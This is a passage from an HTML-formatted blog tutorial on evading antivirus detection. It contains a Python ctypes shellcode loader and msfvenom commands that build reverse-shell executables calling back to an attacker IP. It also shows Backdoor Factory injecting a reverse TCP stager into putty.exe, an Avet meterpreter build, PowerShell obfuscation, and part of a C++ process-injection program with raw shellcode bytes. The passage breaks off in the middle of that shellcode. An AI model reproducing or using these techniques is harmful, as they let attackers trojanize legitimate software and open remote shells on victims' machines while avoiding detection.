&lt;span class="n"&gt;ptr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x3000&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;c_char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)).&lt;/span&gt;&lt;span class="nf"&gt;from_buffer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;RtlMoveMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                     &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                                     &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ht&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ht&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Shellcode Encoder
&lt;/h4&gt;

&lt;p&gt;I also recommend the following encoding tool:&lt;br&gt;
&lt;a href="https://github.com/ecx86/shellcode_encoder" rel="noopener noreferrer"&gt;https://github.com/ecx86/shellcode_encoder&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Beyond language-based shellcode encoding, one may also choose to &lt;strong&gt;encode the shellcode during generation&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;
  
  
  MSFVenom Example:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kali@kali:~&lt;span class="nv"&gt;$ &lt;/span&gt;msfvenom &lt;span class="nt"&gt;-l&lt;/span&gt; encoder

Framework Encoders &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nt"&gt;--encoder&lt;/span&gt; &amp;lt;value&amp;gt;]
&lt;span class="o"&gt;======================================&lt;/span&gt;

    Name                          Rank       Description
    &lt;span class="nt"&gt;----&lt;/span&gt;                          &lt;span class="nt"&gt;----&lt;/span&gt;       &lt;span class="nt"&gt;-----------&lt;/span&gt;
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;IFS&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     &lt;span class="nb"&gt;printf&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;1&lt;span class="o"&gt;)&lt;/span&gt; via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The &lt;span class="s2"&gt;"none"&lt;/span&gt; Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     &lt;span class="nb"&gt;stat&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;2&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nt"&gt;-based&lt;/span&gt; Context Keyed Payload Encoder
    x86/context_time              manual     &lt;span class="nb"&gt;time&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;2&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nt"&gt;-based&lt;/span&gt; Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder &lt;span class="o"&gt;(&lt;/span&gt;optimised&lt;span class="o"&gt;)&lt;/span&gt;
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Using Templates and Encoders
&lt;/h3&gt;

&lt;p&gt;Example usage:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/shell_reverse_tcp &lt;span class="nt"&gt;-x&lt;/span&gt; /usr/share/windows-binaries/plink.exe &lt;span class="nv"&gt;lhost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1.1.1.1 &lt;span class="nv"&gt;lport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;--platform&lt;/span&gt; win &lt;span class="nt"&gt;-f&lt;/span&gt; exe &lt;span class="nt"&gt;-o&lt;/span&gt; a.exe 

msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/shell/bind_tcp &lt;span class="nt"&gt;-x&lt;/span&gt; /usr/share/windows-binaries/plink.exe &lt;span class="nv"&gt;lhost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1.1.1.1 &lt;span class="nv"&gt;lport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 &lt;span class="nt"&gt;-e&lt;/span&gt; x86/shikata_ga_nai &lt;span class="nt"&gt;-i&lt;/span&gt; 5 &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;-platform&lt;/span&gt; win &lt;span class="nt"&gt;-f&lt;/span&gt; exe &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; b.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Veil Encryption:
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjd7u9ho4hsxojfmtrbw3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjd7u9ho4hsxojfmtrbw3.png" alt="Figure 15: Veil framework encryption options" width="800" height="589"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 15: Veil framework encryption options
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Schelper:
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnyypmrncli8at47p86eq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnyypmrncli8at47p86eq.png" alt="Figure 16: Schelper tool interface" width="800" height="358"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 16: Schelper tool interface
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Obfuscation (PowerShell):
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;Invoke-Obfuscation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-ScriptBlock&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;echo&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;xss&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;'Encoding\1,Launcher\PS\67'&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Quiet&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8bmzcka3dz6xyv323a5z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8bmzcka3dz6xyv323a5z.png" alt="Figure 17: PowerShell obfuscation output" width="799" height="307"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 17: PowerShell obfuscation output
  &lt;p&gt;&lt;/p&gt;




&lt;p&gt;This concludes our discussion on &lt;strong&gt;shellcode encoding&lt;/strong&gt; for execution. Other programming languages follow similar principles and will not be enumerated further.&lt;/p&gt;

&lt;p&gt;The preceding examples addressed encoding and encryption of shellcode. Let us now explore &lt;strong&gt;shellcode injection&lt;/strong&gt; techniques.&lt;/p&gt;

&lt;h3&gt;
  
  
  B) Shellcode Injection Obfuscation
&lt;/h3&gt;

&lt;p&gt;A significant number of injection-based evasion techniques incorporate &lt;strong&gt;shellcode fragmentation&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The concept of &lt;strong&gt;fragmentation&lt;/strong&gt; is straightforward: analogous to fragmenting dangerous function names in PHP web shell obfuscation, shellcode can be similarly fragmented to evade detection.&lt;/p&gt;

&lt;p&gt;Shellcode fragmentation can involve &lt;strong&gt;relocating&lt;/strong&gt; the shellcode within the binary—for instance, by creating a new section, populating it with shellcode, and modifying the entry point to jump to the shellcode address before returning to the original program entry point.&lt;/p&gt;

&lt;p&gt;Alternatively, shellcode can be distributed across multiple &lt;strong&gt;code caves&lt;/strong&gt; and executed in segments. This approach is conceptually similar to the &lt;strong&gt;Omelet Shellcode&lt;/strong&gt; technique found in egg-hunt shellcode implementations.&lt;/p&gt;




&lt;p&gt;Let us examine some injection examples:&lt;/p&gt;

&lt;h4&gt;
  
  
  Backdoor Factory (BDF):
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://github.com/secretsquirrel/the-backdoor-factory" rel="noopener noreferrer"&gt;https://github.com/secretsquirrel/the-backdoor-factory&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; In the backdoor module
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Checking &lt;span class="k"&gt;if &lt;/span&gt;binary is supported
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Gathering file info
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Reading win32 entry instructions
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Loading PE &lt;span class="k"&gt;in &lt;/span&gt;pefile
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Parsing data directories
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Looking &lt;span class="k"&gt;for &lt;/span&gt;and setting selected shellcode
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Creating win32 resume execution stub
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Looking &lt;span class="k"&gt;for &lt;/span&gt;caves that will fit the minimum shellcode length of 410
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; All caves lengths:  410
&lt;span class="c"&gt;############################################################&lt;/span&gt;
The following caves can be used to inject code and possibly
&lt;span class="k"&gt;continue &lt;/span&gt;execution.
&lt;span class="k"&gt;**&lt;/span&gt;Don&lt;span class="s1"&gt;'t like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 410
[*] Available caves: 
1. Section Name: DATA; Section Begin: 0x5df200 End: 0x665400; Cave begin: 0x65ea07 End: 0x65ec68; Cave Size: 609
3. Section Name: .rdata; Section Begin: 0x66a000 End: 0x66a200; Cave begin: 0x66a013 End: 0x66a200; Cave Size: 493
4. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8203f End: 0xc82308; Cave Size: 713
5. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc82e1c End: 0xc83050; Cave Size: 564
6. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc830eb End: 0xc83718; Cave Size: 1581
7. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc83b64 End: 0xc840fc; Cave Size: 1432
8. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc843ff End: 0xc846c8; Cave Size: 713
9. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc851dc End: 0xc85410; Cave Size: 564
10. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc854ab End: 0xc859d0; Cave Size: 1317
11. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc86557 End: 0xc86b84; Cave Size: 1581
12. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc86fd0 End: 0xc87568; Cave Size: 1432
13. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8760a End: 0xc87a32; Cave Size: 1064
14. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc886af End: 0xc88d58; Cave Size: 1705
15. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8b8b3 End: 0xc8bdd8; Cave Size: 1317
16. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8eaba End: 0xc8ed65; Cave Size: 683
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;-F&lt;/code&gt; parameter in BDF enables multi-cave injection.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;backdoor-factory &lt;span class="nt"&gt;-f&lt;/span&gt; putty.exe &lt;span class="nt"&gt;-s&lt;/span&gt; show
backdoor-factory &lt;span class="nt"&gt;-f&lt;/span&gt; putty.exe &lt;span class="nt"&gt;-s&lt;/span&gt; iat_reverse_tcp_stager_threaded &lt;span class="nt"&gt;-H&lt;/span&gt; 192.168.15.135 &lt;span class="nt"&gt;-P&lt;/span&gt; 4444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Shellter:
&lt;/h4&gt;

&lt;p&gt;The 'A' option enables section-based injection.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fo4v7nhmbnzgi3nko2de0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fo4v7nhmbnzgi3nko2de0.png" alt="Figure 18: Shellter section injection options" width="800" height="365"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 18: Shellter section injection options
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Avet:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@kali:/tmp/avet/build# leafpad build_win64_meterpreter_rev_tcp_xor_fopen.sh 

&lt;span class="nv"&gt;lhost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134

root@kali:/tmp/avet/build# &lt;span class="nb"&gt;cd&lt;/span&gt; ..

root@kali:/tmp/avet# ./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh

No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;iteration&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;)&lt;/span&gt;
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of c file: 2339 bytes
./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh: line 6: ./make_avet: cannot execute binary file: Exec format error
avet.c: In &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="s1"&gt;'main'&lt;/span&gt;:
avet.c:122:15: error: &lt;span class="s1"&gt;'buf'&lt;/span&gt; undeclared &lt;span class="o"&gt;(&lt;/span&gt;first use &lt;span class="k"&gt;in &lt;/span&gt;this &lt;span class="k"&gt;function&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
   shellcode &lt;span class="o"&gt;=&lt;/span&gt; buf&lt;span class="p"&gt;;&lt;/span&gt;
               ^
avet.c:122:15: note: each undeclared identifier is reported only once &lt;span class="k"&gt;for &lt;/span&gt;each &lt;span class="k"&gt;function &lt;/span&gt;it appears &lt;span class="k"&gt;in&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Legitimate Process Injection
&lt;/h4&gt;

&lt;p&gt;Shellcode can also be injected into a legitimate running process manually. Example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"stdafx.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;Windows.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt;&lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"iostream"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xb8\x72\xd9\xb8\x52\xda\xd8\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x7d\x3b\x4d\xae\x69\x39&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xae\x4f\x69\x5e\x26\xaa\x58\x5e\x5c\xbe\xca\x6e\x16\x92\xe6&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x05\x7a\x07\x7d\x6b\x53\x28\x36\xc6\x85\x07\xc7\x7b\xf5\x06&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x4b\x86\x2a\xe9\x72\x49\x3f\xe8\xb3\xb4\xb2\xb8\x6c\xb2\x61&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x2d\x19\x8e\xb9\xc6\x51\x1e\xba\x3b\x21\x21\xeb\xed\x3a\x78&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
